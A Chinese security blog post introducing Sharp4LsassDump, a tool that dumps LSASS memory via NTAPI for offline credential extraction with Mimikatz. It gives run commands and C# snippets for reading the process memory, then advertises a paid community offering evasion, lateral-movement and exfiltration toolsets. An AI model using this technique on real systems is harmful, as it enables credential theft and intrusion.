01
阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02
基本介绍
Sharp4LsassDump是一款专为Windows系统设计的lsass进程转储工具,使用NTAPI而非常见的dbghelp!MinidumpWriteDump函数,生成一个转储文件。这个文件仅包含解析工具如Mimikatz所需的流,包括SystemInfo、ModuleList和Memory64List等流。
03
使用方法
Sharp4LsassDump的使用非常简单,支持两种运行方式:默认情况下,Sharp4LsassDump会在当前目录下生成转储文件。另外,可以传入一个参数[DUMP_FILE]来指定转储文件的保存路径。具体用法如下所示。
Sharp4LsassDump.exe
Sharp4LsassDump.exe C:dumplsass.dmp
04
原理解析
Sharp4LsassDump的核心在于通过NTAPI进行进程内存的读取与操作。部分核心代码如下:
IntPtr processHandle = IntPtr.Zero;
CLIENT_ID client_id = new CLIENT_ID();
client_id.UniqueProcess = (IntPtr)processPID;
client_id.UniqueThread = IntPtr.Zero;
OBJECT_ATTRIBUTES objAttr = new OBJECT_ATTRIBUTES();
uint ntstatus = NtOpenProcess(ref processHandle, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, ref objAttr, ref client_id);
首先,通过NtOpenProcess函数打开目标进程句柄,指定的权限为PROCESS_QUERY_INFORMATION和PROCESS_VM_READ,允许我们查询进程信息及读取其虚拟内存。接着,通过CustomGetModuleHandle函数获取lsasrv.dll模块的加载地址:
IntPtr lsasrvdll_address = CustomGetModuleHandle(processHandle, "lsasrv.dll");
int lsasrvdll_size = 0;
bool bool_test = false;
接下来是查询虚拟内存信息并读取lsass进程的指定内存区域,通过NtQueryVirtualMemory获取指定内存地址的内存信息,然后使用NtReadVirtualMemory函数读取该区域的内存数据并存储到buffer数组中。
MEMORY_BASIC_INFORMATION mbi = new MEMORY_BASIC_INFORMATION();
ntstatus = NtQueryVirtualMemory(processHandle, (IntPtr)mem_address, MemoryBasicInformation, out mbi, 0x30, out _);
byte[] buffer = new byte[(int)mbi.RegionSize];
ntstatus = NtReadVirtualMemory(processHandle, mbi.BaseAddress, buffer, (int)mbi.RegionSize, out _);
随后,将读取的数据与现有的memory_regions数组拼接在一起,形成最终的转储数据
通过这种方式,Sharp4LsassDump能够仅将必要的内存区域存储到转储文件中,而不会转储整个lsass进程的内存。byte[] new_bytearray = new byte[memory_regions.Length + buffer.Length];
Buffer.BlockCopy(memory_regions, 0, new_bytearray, 0, memory_regions.Length);
Buffer.BlockCopy(buffer, 0, new_bytearray, memory_regions.Length, buffer.Length);
memory_regions = new_bytearray;
05
推荐阅读
从漏洞分析到安全攻防,我们涵盖了.NET安全各个关键方面,为您呈现最新、最全面的.NET安全知识,下面是公众号发布的精华文章集合,推荐大家阅读!
06
欢迎加入.NET安全星球
为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,也得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展。 星球门票后期价格随着内容和质量的不断沉淀会适当提高,因此越早加入越好!
目前dot.Net安全矩阵星球已成为中国.NET安全领域最知名、最活跃的技术知识库之一,从.NET Framework到.NET Core,从Web应用到PC端软件应用,无论您是初学者还是经验丰富的开发人员,都能在这里找到对应的安全指南和最佳实践。
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
星球文化始终认为授人以鱼不如授人以渔!加入星球后可以跟星主和嘉宾们一对一提问交流,20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
我们还有一个会员专属的内部星球陪伴群,加入的成员可以通过在群里提出问题或参与论的方式来与其他成员交流思想和经验。此外还可以通过星球或者微信群私聊向我们进行提问,以获取帮助迅速解决问题。
为了助力大家在2024国家级hvv演练中脱颖而出,我们特别整理出了一套涵盖dotNet安全矩阵星球的八大.NET相关方向工具集。
.NET 免杀WebShell
.NET 反序列化漏洞
.NET 安全防御绕过
.NET 内网信息收集
.NET 本地权限提升
.NET 内网横向移动
.NET 目标权限维持
.NET 数据外发传输
这些阶段所涉及的工具集不仅代表了当前.NET安全领域的最前沿技术,更是每一位网络安全爱好者不可或缺的实战利器。
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...